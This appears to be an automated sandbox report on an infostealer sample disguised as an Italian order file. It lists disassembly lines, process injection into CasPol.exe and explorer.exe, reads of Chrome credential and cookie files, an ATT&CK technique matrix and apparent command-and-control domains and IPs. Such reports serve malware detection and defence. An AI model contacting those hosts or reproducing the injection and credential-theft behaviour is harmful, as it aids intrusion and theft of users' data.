          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164DBE9 mov eax, dword ptr fs:[00000030h]1_2_0164DBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D23E3 mov ecx, dword ptr fs:[00000030h]1_2_016D23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D23E3 mov ecx, dword ptr fs:[00000030h]1_2_016D23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D23E3 mov eax, dword ptr fs:[00000030h]1_2_016D23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A53CA mov eax, dword ptr fs:[00000030h]1_2_016A53CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A53CA mov eax, dword ptr fs:[00000030h]1_2_016A53CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654BAD mov eax, dword ptr fs:[00000030h]1_2_01654BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654BAD mov eax, dword ptr fs:[00000030h]1_2_01654BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654BAD mov eax, dword ptr fs:[00000030h]1_2_01654BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F5BA5 mov eax, dword ptr fs:[00000030h]1_2_016F5BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E138A mov eax, dword ptr fs:[00000030h]1_2_016E138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01631B8F mov eax, dword ptr fs:[00000030h]1_2_01631B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01631B8F mov eax, dword ptr fs:[00000030h]1_2_01631B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DD380 mov ecx, dword ptr fs:[00000030h]1_2_016DD380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652397 mov eax, dword ptr fs:[00000030h]1_2_01652397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165B390 mov eax, dword ptr fs:[00000030h]1_2_0165B390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DB260 mov eax, dword ptr fs:[00000030h]1_2_016DB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DB260 mov eax, dword ptr fs:[00000030h]1_2_016DB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F8A62 mov eax, dword ptr fs:[00000030h]1_2_016F8A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166927A mov eax, dword ptr fs:[00000030h]1_2_0166927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629240 mov eax, dword ptr fs:[00000030h]1_2_01629240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629240 mov eax, dword ptr fs:[00000030h]1_2_01629240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629240 mov eax, dword ptr fs:[00000030h]1_2_01629240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629240 mov eax, dword ptr fs:[00000030h]1_2_01629240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EEA55 mov eax, dword ptr fs:[00000030h]1_2_016EEA55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016B4257 mov eax, dword ptr fs:[00000030h]1_2_016B4257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01664A2C mov eax, dword ptr fs:[00000030h]1_2_01664A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01664A2C mov eax, dword ptr fs:[00000030h]1_2_01664A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01638A0A mov eax, dword ptr fs:[00000030h]1_2_01638A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01625210 mov eax, dword ptr fs:[00000030h]1_2_01625210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01625210 mov ecx, dword ptr fs:[00000030h]1_2_01625210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01625210 mov eax, dword ptr fs:[00000030h]1_2_01625210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01625210 mov eax, dword ptr fs:[00000030h]1_2_01625210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162AA16 mov eax, dword ptr fs:[00000030h]1_2_0162AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162AA16 mov eax, dword ptr fs:[00000030h]1_2_0162AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01643A1C mov eax, dword ptr fs:[00000030h]1_2_01643A1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EAA16 mov eax, dword ptr fs:[00000030h]1_2_016EAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EAA16 mov eax, dword ptr fs:[00000030h]1_2_016EAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652AE4 mov eax, dword ptr fs:[00000030h]1_2_01652AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652ACB mov eax, dword ptr fs:[00000030h]1_2_01652ACB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163AAB0 mov eax, dword ptr fs:[00000030h]1_2_0163AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163AAB0 mov eax, dword ptr fs:[00000030h]1_2_0163AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165FAB0 mov eax, dword ptr fs:[00000030h]1_2_0165FAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165D294 mov eax, dword ptr fs:[00000030h]1_2_0165D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165D294 mov eax, dword ptr fs:[00000030h]1_2_0165D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164C577 mov eax, dword ptr fs:[00000030h]1_2_0164C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164C577 mov eax, dword ptr fs:[00000030h]1_2_0164C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01663D43 mov eax, dword ptr fs:[00000030h]1_2_01663D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A3540 mov eax, dword ptr fs:[00000030h]1_2_016A3540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D3D40 mov eax, dword ptr fs:[00000030h]1_2_016D3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01647D50 mov eax, dword ptr fs:[00000030h]1_2_01647D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162AD30 mov eax, dword ptr fs:[00000030h]1_2_0162AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03252ACB mov eax, dword ptr fs:[00000030h]11_2_03252ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov eax, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov eax, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov eax, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov eax, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov ecx, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325513A mov eax, dword ptr fs:[00000030h]11_2_0325513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325513A mov eax, dword ptr fs:[00000030h]11_2_0325513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229100 mov eax, dword ptr fs:[00000030h]11_2_03229100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229100 mov eax, dword ptr fs:[00000030h]11_2_03229100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229100 mov eax, dword ptr fs:[00000030h]11_2_03229100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322C962 mov eax, dword ptr fs:[00000030h]11_2_0322C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322B171 mov eax, dword ptr fs:[00000030h]11_2_0322B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322B171 mov eax, dword ptr fs:[00000030h]11_2_0322B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324B944 mov eax, dword ptr fs:[00000030h]11_2_0324B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324B944 mov eax, dword ptr fs:[00000030h]11_2_0324B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032561A0 mov eax, dword ptr fs:[00000030h]11_2_032561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032561A0 mov eax, dword ptr fs:[00000030h]11_2_032561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E49A4 mov eax, dword ptr fs:[00000030h]11_2_032E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E49A4 mov eax, dword ptr fs:[00000030h]11_2_032E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E49A4 mov eax, dword ptr fs:[00000030h]11_2_032E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E49A4 mov eax, dword ptr fs:[00000030h]11_2_032E49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe; Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 1_2_0040CED3 LdrLoadDll, 1_2_0040CED3
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe; Network Connect: 148.251.13.126 80
          Source: C:\Windows\explorer.exe; Network Connect: 81.169.145.158 80
          Source: C:\Windows\explorer.exe; Domain query: www.treebarktees.com
          Source: C:\Windows\explorer.exe; Domain query: www.hotelyeah.top
          Source: C:\Windows\explorer.exe; Network Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exe; Domain query: www.jewelryimpact.com
          Source: C:\Windows\explorer.exe; Domain query: www.frogair.online
          Source: C:\Windows\explorer.exe; Domain query: www.krankenzusatz.net
          Source: C:\Windows\explorer.exe; Domain query: www.specigain.online
          Source: C:\Windows\explorer.exe; Network Connect: 199.192.22.198 80
          Source: C:\Windows\explorer.exe; Network Connect: 91.195.240.117 80
          Source: C:\Windows\explorer.exe; Network Connect: 81.169.145.72 80
          Source: C:\Windows\explorer.exe; Domain query: www.tobinrasheedja.cyou
          Source: C:\Windows\explorer.exe; Domain query: www.gachthe365.site
          Source: C:\Windows\explorer.exe; Domain query: www.nativealternatives.com
          Source: C:\Windows\explorer.exe; Network Connect: 103.191.208.50 80
          Source: C:\Windows\explorer.exe; Network Connect: 75.102.22.168 80
          Source: C:\Windows\explorer.exe; Domain query: www.verde-amar.info
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1A0000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F7D008
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Thread register set: target process: 3452
          Source: C:\Windows\SysWOW64\svchost.exe; Thread register set: target process: 3452
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: explorer.exe, 00000002.00000002.522664704.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.271038727.0000000001980000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000002.00000002.527996551.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.292892221.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.531863338.00000000090D8000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.522664704.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.271038727.0000000001980000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.270128037.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.521890354.0000000001378000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CProgmanile
          Source: explorer.exe, 00000002.00000002.522664704.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.271038727.0000000001980000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Queries volume information: C:\Users\user\Desktop\Requisito ordine n. 230210.exe VolumeInformation
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match; File source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\svchost.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\svchost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\svchost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\svchost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\svchost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\svchost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\svchost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          Source: Yara match; File source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Shared Modules | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 4 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 812 Process Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 21 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 23 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 812 Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

          [Behavior graph, ID 803902. Sample: Requisito ordine n. 230210.exe; start date: 10/02/2023; architecture: WINDOWS; score: 100. Process chain shown: Requisito ordine n. 230210.exe starts CasPol.exe and conhost.exe; CasPol.exe injects into explorer.exe; explorer.exe starts svchost.exe.]

          Source | Detection | Scanner | Label | Link
          Requisito ordine n. 230210.exe | 18% | ReversingLabs
          Requisito ordine n. 230210.exe | 100% | Joe Sandbox ML
          No Antivirus matches
          Source | Detection | Scanner | Label | Link | Download
          1.2.CasPol.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.specigain.online0%Avira URL Cloudsafe
          http://treebarktees.com/vqh7/?u1ua=avntfzZWwL7S0%Avira URL Cloudsafe
          http://www.nkgtrust.org/vqh7/0%Avira URL Cloudsafe
          http://www.verde-amar.info/vqh7/0%Avira URL Cloudsafe
          http://www.treebarktees.com/vqh7/0%Avira URL Cloudsafe
          http://www.gachthe365.site/vqh7/0%Avira URL Cloudsafe
          http://www.dinggubd.net/vqh7/0%Avira URL Cloudsafe
          http://www.dinggubd.netReferer:0%Avira URL Cloudsafe
